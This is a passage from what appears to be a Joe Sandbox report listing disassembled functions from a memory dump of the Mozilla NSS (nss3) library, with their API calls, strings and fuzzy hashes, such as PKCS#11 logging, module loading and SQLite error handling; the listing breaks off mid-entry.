Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
String ID: %s decr => %d$Unloaded library %s
API String ID: 4015679603-2877805755
Opcode ID: ef4942ff2984f1778944911e67fe42354c0dbe96bff54c8b08a9f9d7863c19a2
Instruction ID: 9d2c345fc7639c96f7b7f0fe5dd7c6e05b132fec79753e183ac7fced12a0adfb
Opcode Fuzzy Hash: ef4942ff2984f1778944911e67fe42354c0dbe96bff54c8b08a9f9d7863c19a2
Instruction Fuzzy Hash: 15314DB6B09111ABDB019F64DE44A05BBB4EF0A32CB644635EC0597B40F732E814C7E1

Function 6C836C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C83781D,00000000,6C82BE2C,?,6C836B1D,?,?,?,?,00000000,00000000,6C83781D), ref: 6C836C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C83781D,?,6C82BE2C,?), ref: 6C836C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C83781D), ref: 6C836C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C836C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C836C96

Part of subcall function 6C7E1240: TlsGetValue.KERNEL32(00000040,?,6C7E116C,NSPR_LOG_MODULES), ref: 6C7E1267
Part of subcall function 6C7E1240: EnterCriticalSection.KERNEL32(?,?,?,6C7E116C,NSPR_LOG_MODULES), ref: 6C7E127C
Part of subcall function 6C7E1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C7E116C,NSPR_LOG_MODULES), ref: 6C7E1291
Part of subcall function 6C7E1240: PR_Unlock.NSS3(?,?,?,?,6C7E116C,NSPR_LOG_MODULES), ref: 6C7E12A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C836CAA

Strings

rdb:, xrefs: 6C836C69
dbm:, xrefs: 6C836C3A
sql:, xrefs: 6C836C52
dbm, xrefs: 6C836CA4
extern:, xrefs: 6C836C7E
NSS_DEFAULT_DB_TYPE, xrefs: 6C836C91

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: 195c75b5ddd983ea5d942ec3bbd9226745ed81882bb8af46c2bb30baa698d56c
Instruction ID: f86fda92f3f56e6698dfbffda85ca9a822a12c633383ba982a4565491a1d71d7
Opcode Fuzzy Hash: 195c75b5ddd983ea5d942ec3bbd9226745ed81882bb8af46c2bb30baa698d56c
Instruction Fuzzy Hash: EF01D4A170732167E71027A91E5AF27251DABC154CF192831FE0DE1941FB92DA1940E5

Function 6C8425F0 Relevance: 19.9, APIs: 8, Strings: 5, Instructions: 403stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C84A0A0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C81A5DF,?,00000000,6C7F28AD,00000000,?,6C81A5DF,?,object), ref: 6C84A0C0
Part of subcall function 6C84A0A0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C81A5DF,?,00000000,6C7F28AD,00000000,?,6C81A5DF,?,object), ref: 6C84A0E8

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C842834
memcmp.VCRUNTIME140(00000000,00000020,00000020,?,?,?,?,?,?,?,?), ref: 6C84284B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C842A98
memcmp.VCRUNTIME140(00000000,?,00000020,?,?,?,?,?,?,?,?,?,?), ref: 6C842AAF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C842BDC
memcmp.VCRUNTIME140(00000000,?,00000010,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C842BF3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C842D23
memcmp.VCRUNTIME140(00000000,?,00000010,?,?,?,?,?,?,?,?,?), ref: 6C842D34

Strings

serial, xrefs: 6C842AC2
manufacturer, xrefs: 6C84285E
, xrefs: 6C842A8E, 6C842AAB
token, xrefs: 6C8425FA
model, xrefs: 6C842C06

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: memcmpstrlen$strcmp
String ID: $manufacturer$model$serial$token
API String ID: 2407968032-2628435027
Opcode ID: 6b0072e556f7c5c6fb12b140afceb7696b668052bd93b3e15da53c9e3e0d4f8f
Instruction ID: 78888a8a0d65bb2622b099af2f27dd8110216f54dfc312ccbec2bb333c53225e
Opcode Fuzzy Hash: 6b0072e556f7c5c6fb12b140afceb7696b668052bd93b3e15da53c9e3e0d4f8f
Instruction Fuzzy Hash: 6E02FFA1E0C3CD6EF7318722C98CBE52AE05B0931CF4D99F6C94DCBA93C6AD45598351

Function 6C844E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON

Download Yara Rule

APIs

PR_SetErrorText.NSS3(00000000,00000000,?,6C8078F8), ref: 6C844E6D

Part of subcall function 6C7E09E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C7E06A2,00000000,?), ref: 6C7E09F8
Part of subcall function 6C7E09E0: malloc.MOZGLUE(0000001F), ref: 6C7E0A18
Part of subcall function 6C7E09E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C7E0A33

PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C8078F8), ref: 6C844ED9

Part of subcall function 6C835920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C837703,?,00000000,00000000), ref: 6C835942
Part of subcall function 6C835920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C837703), ref: 6C835954
Part of subcall function 6C835920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C83596A
Part of subcall function 6C835920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C835984
Part of subcall function 6C835920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C835999
Part of subcall function 6C835920: free.MOZGLUE(00000000), ref: 6C8359BA
Part of subcall function 6C835920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C8359D3
Part of subcall function 6C835920: free.MOZGLUE(00000000), ref: 6C8359F5
Part of subcall function 6C835920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C835A0A
Part of subcall function 6C835920: free.MOZGLUE(00000000), ref: 6C835A2E
Part of subcall function 6C835920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C835A43

SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C8078F8), ref: 6C844EB3

Part of subcall function 6C844820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C844EB8,?,?,?,?,?,?,?,?,?,?,6C8078F8), ref: 6C84484C
Part of subcall function 6C844820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C844EB8,?,?,?,?,?,?,?,?,?,?,6C8078F8), ref: 6C84486D
Part of subcall function 6C844820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C844EB8,?), ref: 6C844884

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C8078F8), ref: 6C844EC0

Part of subcall function 6C844470: TlsGetValue.KERNEL32(00000000,?,6C807296,00000000), ref: 6C844487
Part of subcall function 6C844470: EnterCriticalSection.KERNEL32(?,?,?,6C807296,00000000), ref: 6C8444A0
Part of subcall function 6C844470: PR_Unlock.NSS3(?,?,?,?,6C807296,00000000), ref: 6C8444BB

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C8078F8), ref: 6C844F16
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C8078F8), ref: 6C844F2E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C8078F8), ref: 6C844F40
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C8078F8), ref: 6C844F6C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C8078F8), ref: 6C844F80
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C8078F8), ref: 6C844F8F
PK11_UpdateSlotAttribute.NSS3(?,6C91DCB0,00000000), ref: 6C844FFE
PK11_UserDisableSlot.NSS3(0000001E), ref: 6C84501F
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C8078F8), ref: 6C84506B

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
String ID:
API String ID: 560490210-0
Opcode ID: a6fc50e71e60ce689f6270087cd24e31766bd61803ecbd48d0ae61b46da6c8bf
Instruction ID: 70fc2c097a28b37ea09e4f71c419ad6d71cd0f0fdf83a0fde03252c5bc03b6ce
Opcode Fuzzy Hash: a6fc50e71e60ce689f6270087cd24e31766bd61803ecbd48d0ae61b46da6c8bf
Instruction Fuzzy Hash: DA5137B59046099FDB21AF28DE05AAF36B4FF4531DF148935EC0A86A11F731D524CAD2

Function 6C7EACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7EACE2
malloc.MOZGLUE(00000001), ref: 6C7EACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C7EAD02
TlsGetValue.KERNEL32 ref: 6C7EAD3C
calloc.MOZGLUE(00000001,?), ref: 6C7EAD8C
PR_Unlock.NSS3 ref: 6C7EADC0
free.MOZGLUE(00000000), ref: 6C7EAE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C7EAE58
free.MOZGLUE(00000000), ref: 6C7EAE69
free.MOZGLUE(?), ref: 6C7EAE78
PR_Unlock.NSS3 ref: 6C7EAE8C
free.MOZGLUE(?), ref: 6C7EAEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C7EAEC7

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: 31a1734d533972292928a1ad06891a28fc1e19b0300ea359c2d923411ac392d8
Instruction ID: fe2f3e3403a0dd4086dd228d3e43add30a74c74bf6f8e0f8c4d97b5a4470e41e
Opcode Fuzzy Hash: 31a1734d533972292928a1ad06891a28fc1e19b0300ea359c2d923411ac392d8
Instruction Fuzzy Hash: 3F51E5B2E051158FDF00EF68CE466AE7BB8BB0A359F644535D805A7B50E331E918CBD2

Function 6C82ADC0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C82ADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C82AE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C82AE29

Part of subcall function 6C90D930: PL_strncpyz.NSS3(?,?,?), ref: 6C90D963

PR_LogPrint.NSS3(?,00000000), ref: 6C82AE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C82AE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C82AE8A
PR_LogPrint.NSS3(?,00000000), ref: 6C82AEA0

Strings

hKey = 0x%x, xrefs: 6C82AE62, 6C82AE72
hSession = 0x%x, xrefs: 6C82AE01, 6C82AE11
(CK_INVALID_HANDLE), xrefs: 6C82AE1F, 6C82AE80
C_MessageSignInit, xrefs: 6C82ADE1

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
API String ID: 332880674-605059067
Opcode ID: 86579f107c5d4b90964aa01bf4154c4f28ca82fac3886f04350a50121947537c
Instruction ID: 0856050d855a8db3f78efd514d0791febbaa8f446dee3f4cd8700694e902cc22
Opcode Fuzzy Hash: 86579f107c5d4b90964aa01bf4154c4f28ca82fac3886f04350a50121947537c
Instruction Fuzzy Hash: 53311576605204EBCB109F14DE8DBEB37B5AF5631DF944829E4086BB01DB38D949CBD1

Function 6C8C4C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6C8C4CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C8C4CFD
sqlite3_value_text16.NSS3(?), ref: 6C8C4D44

Strings

abort due to ROLLBACK, xrefs: 6C8C4D27, 6C8C4D33
API call with %s database connection pointer, xrefs: 6C8C4CF6
invalid, xrefs: 6C8C4CF1
out of memory, xrefs: 6C8C4C78, 6C8C4C9E
bad parameter or other API misuse, xrefs: 6C8C4D05
no more rows available, xrefs: 6C8C4D2E
unknown error, xrefs: 6C8C4D56
another row available, xrefs: 6C8C4D20

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: d3faec8548aec866f4c931052b0264dcacb254fb9292e42b79f64bd41f50b8d8
Instruction ID: 3a4ebdbee5a08939d7a40681a39768a392e02dfc3daac01f86a1bcd4a63dae6a
Opcode Fuzzy Hash: d3faec8548aec866f4c931052b0264dcacb254fb9292e42b79f64bd41f50b8d8
Instruction Fuzzy Hash: B4318873B08915A7E7345724AA047B57331BBC2319F264D29D5244BE28CB34ECE283D3

Function 6C822DD0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6C822DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C822E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C822E33

Part of subcall function 6C90D930: PL_strncpyz.NSS3(?,?,?), ref: 6C90D963

PR_LogPrint.NSS3(?,00000000), ref: 6C822E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C822E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C822E81

Strings

ulPinLen = %d, xrefs: 6C822E7C
hSession = 0x%x, xrefs: 6C822E0E, 6C822E1E
(CK_INVALID_HANDLE), xrefs: 6C822E2C
C_InitPIN, xrefs: 6C822DF1
pPin = 0x%p, xrefs: 6C822E63

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
API String ID: 1003633598-1777813432
Opcode ID: 3229ef1447bc07bec64a5b8a8f1c83714cba0c03af008c71603c1f32944ab6e7
Instruction ID: b7e5ebb790e7dd9418b9d88415f52fd53b216d4ffbff7412b8eb7ce5f8080c05
Opcode Fuzzy Hash: 3229ef1447bc07bec64a5b8a8f1c83714cba0c03af008c71603c1f32944ab6e7
Instruction Fuzzy Hash: 55314875A05118AFCB20DF58CE4CB5B37B5EB5232CF944425E808A7B12DB38D988DBD1

Function 6C826EF0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestUpdate), ref: 6C826F16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C826F44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C826F53

Part of subcall function 6C90D930: PL_strncpyz.NSS3(?,?,?), ref: 6C90D963

PR_LogPrint.NSS3(?,00000000), ref: 6C826F69
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C826F88
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C826FA1

Strings

C_DigestUpdate, xrefs: 6C826F11
ulPartLen = %d, xrefs: 6C826F9C
hSession = 0x%x, xrefs: 6C826F2E, 6C826F3E
(CK_INVALID_HANDLE), xrefs: 6C826F4C
pPart = 0x%p, xrefs: 6C826F83

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate
API String ID: 1003633598-226530419
Opcode ID: 7011991548f47a031a9882344e369731a003714b113bd765fbcdc21b47d6557f
Instruction ID: 9b71c715cfbdee13e89849eb06c44a6ce29cd266b3ec614f3374791dfd9703f7
Opcode Fuzzy Hash: 7011991548f47a031a9882344e369731a003714b113bd765fbcdc21b47d6557f
Instruction Fuzzy Hash: 0431F571605544EFDB20DF24DE4CB5A77B1AB5231CF984429E808A7B11DB34D988CBD1

Function 6C792450 Relevance: 19.2, APIs: 15, Instructions: 440COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C7924BA
LeaveCriticalSection.KERNEL32(?), ref: 6C79250D
EnterCriticalSection.KERNEL32(?), ref: 6C792554
LeaveCriticalSection.KERNEL32(?), ref: 6C7925A7
EnterCriticalSection.KERNEL32(?), ref: 6C792609
LeaveCriticalSection.KERNEL32(?), ref: 6C79265F
EnterCriticalSection.KERNEL32(?), ref: 6C7926A2
LeaveCriticalSection.KERNEL32(?), ref: 6C7926F5
EnterCriticalSection.KERNEL32(?), ref: 6C792764
LeaveCriticalSection.KERNEL32(?), ref: 6C792898
EnterCriticalSection.KERNEL32(?), ref: 6C7928D0
EnterCriticalSection.KERNEL32(?), ref: 6C792948
LeaveCriticalSection.KERNEL32(?), ref: 6C79299B
EnterCriticalSection.KERNEL32(?), ref: 6C7929E2
LeaveCriticalSection.KERNEL32(?), ref: 6C792A31

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: CriticalSection$Enter$Leave
String ID:
API String ID: 2801635615-0
Opcode ID: 6e34eef55876f297ed801102af201fb66b9247e800718571fa0c8b7529b28edc
Instruction ID: 565ec3c29a6f1d5bfa6425bc3d3a83b7aa419f72dcee4bb15ac93c4379fcb904
Opcode Fuzzy Hash: 6e34eef55876f297ed801102af201fb66b9247e800718571fa0c8b7529b28edc
Instruction Fuzzy Hash: 6FF19E32B0D110CFDB14FF64EA8DA7A7730BB47319BB8412DE91657A00DB39A941CB92

Function 6C85E400 Relevance: 18.2, APIs: 12, Instructions: 206threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C85C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C85DAE2,?), ref: 6C85C6C2

SECOID_GetAlgorithmTag_Util.NSS3(-000000D8), ref: 6C85E4A0
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C85E4B1
SECOID_GetAlgorithmTag_Util.NSS3(-00000010), ref: 6C85E4C4
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C85E4D2
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,00000000), ref: 6C85E525
PK11_FreeSymKey.NSS3(00000000), ref: 6C85E592
PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,00000000), ref: 6C85E5CF
PR_GetCurrentThread.NSS3 ref: 6C85E5F2
PR_SetError.NSS3(00000000,00000000), ref: 6C85E601
PK11_PubUnwrapSymKey.NSS3(?,?,-00000001,00000105,00000000), ref: 6C85E620
PR_GetCurrentThread.NSS3 ref: 6C85E632
PR_SetError.NSS3(00000000,00000000), ref: 6C85E641

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Util$Tag_$AlgorithmK11_$CurrentErrorFindFreeThread$DestroyPrivateUnwrap
String ID:
API String ID: 2900466288-0
Opcode ID: 0bc1631960c6d0899d0a294fe533626a616dd6530c5db37532974fde7fbc6855
Instruction ID: ba04d5d46fc3e77e3e08342e5678b05f00da2d5c44a1db5a42edcfde69ac1b65
Opcode Fuzzy Hash: 0bc1631960c6d0899d0a294fe533626a616dd6530c5db37532974fde7fbc6855
Instruction Fuzzy Hash: BD61A5F19006099FDB60CF68DE84A6B77F8AF04208B941D39D84A97B11F7B5E914CBD1

Function 6C8C2D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C8C2D9F

Part of subcall function 6C77CA30: EnterCriticalSection.KERNEL32(?,?,?,6C7DF9C9,?,6C7DF4DA,6C7DF9C9,?,?,6C7A369A), ref: 6C77CA7A
Part of subcall function 6C77CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C77CB26

